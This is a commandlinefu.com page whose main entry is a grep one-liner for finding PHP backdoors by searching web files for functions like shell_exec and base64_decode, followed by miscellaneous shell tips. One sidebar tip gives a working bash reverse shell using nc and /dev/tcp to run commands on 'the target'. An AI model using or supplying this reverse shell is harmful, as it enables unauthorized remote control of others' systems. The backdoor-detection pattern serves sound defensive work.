grep -RPl --include=*.{php,txt,asp} "(passthru|shell_exec|system|phpinfo|base64_decode|chmod|mkdir|fopen|fclose|readf?ile) *\(" /var/www/

find php command backdoor


0
By: siamware
2013-08-23 09:17:28

These Might Interest You

  • This is sneaky. First, start a listening service on your box. nc -l 8080 -vvv & On the target you will create a new descriptor which is assigned to a network node. Then you will read and write to that descriptor. exec 5<>/dev/tcp/<your_box>/8080;cat <&5 | while read line; do $line 2>&5 >&5; done You can send it to the background like this: (exec 5<>/dev/tcp/<your-box>/8080;cat <&5 | while read line; do $line 2>&5 >&5;) & Now everything you type in our local listening server will get executed on the target and the output of the commands will be piped back to the client. Show Sample Output


    8
    exec 5<>/dev/tcp/<your-box>/8080;cat <&5 | while read line; do $line 2>&5 >&5; done
    somaddict · 2012-11-16 02:48:01 0
  • Similar to entering a command, but will not erase the command from the command line. Basically a shortcut from entering command, then pushing the up arrow key. Show Sample Output


    8
    <ctrl>+o
    snipertyler · 2014-12-28 22:00:15 2
  • ! will expand to the last time you ran , options and all. It's a nicer alternative to ^R for simple cases, and it's quite helpful for those long commands you run every now and then and haven't made aliases or functions for. It's similar to command 3966, in some sense. Show Sample Output


    1
    !<command>
    kaedenn · 2011-08-16 18:37:18 2
  • When writing on the command line of zsh, by pressing Alt+q the command will be cleaned, and you can insert another one. The command you were writing will be recorder, and pasted on the prompt immediately after the "interrupting" command is inserted. Show Sample Output


    5
    <alt+q>
    luther · 2009-10-29 14:55:12 1
  • Slightly simpler version of previous sed command that does the same thing. In this case, the output will stop at the command, and the entire command will be terminated as well, instead of proceeding through the whole file.


    1
    command | sed '/regex/q'
    taliver · 2009-12-29 14:52:41 0
  • 5 helpful aliases for using the which utility, specifically for the GNU which (2.16 tested) that is included in coreutils. Which is run first for a command. Same as type builtin minus verbosity alias which='{ command alias; command declare -f; } | command which --read-functions --read-alias' Which (a)lias alias whicha='command alias | command which --read-alias' Which (f)unction alias whichf='command declare -f | command which --read-functions' Which e(x)ecutable file in PATH alias whichx='command which' Which (all) alias, function, builtin, and files in PATH alias whichall='{ command alias; command declare -f; } | command which --read-functions --read-alias -a' # From my .bash_profile http://www.askapache.com/linux-unix/bash_profile-functions-advanced-shell.html Show Sample Output


    2
    alias whichall='{ command alias; command declare -f; } | command which --read-functions --read-alias -a'
    AskApache · 2010-11-18 03:32:04 5

What do you think?

Any thoughts on this command? Does it work on your machine? Can you do the same thing with only 14 characters?

You must be signed in to comment.

What's this?

commandlinefu.com is the place to record those command-line gems that you return to again and again. That way others can gain from your CLI wisdom and you from theirs too. All commands can be commented on, discussed and voted up or down.

Share Your Commands



Stay in the loop…

Follow the Tweets.

Every new command is wrapped in a tweet and posted to Twitter. Following the stream is a great way of staying abreast of the latest commands. For the more discerning, there are Twitter accounts for commands that get a minimum of 3 and 10 votes - that way only the great commands get tweeted.

» http://twitter.com/commandlinefu
» http://twitter.com/commandlinefu3
» http://twitter.com/commandlinefu10

Subscribe to the feeds.

Use your favourite RSS aggregator to stay in touch with the latest commands. There are feeds mirroring the 3 Twitter streams as well as for virtually every other subset (users, tags, functions,…):

Subscribe to the feed for: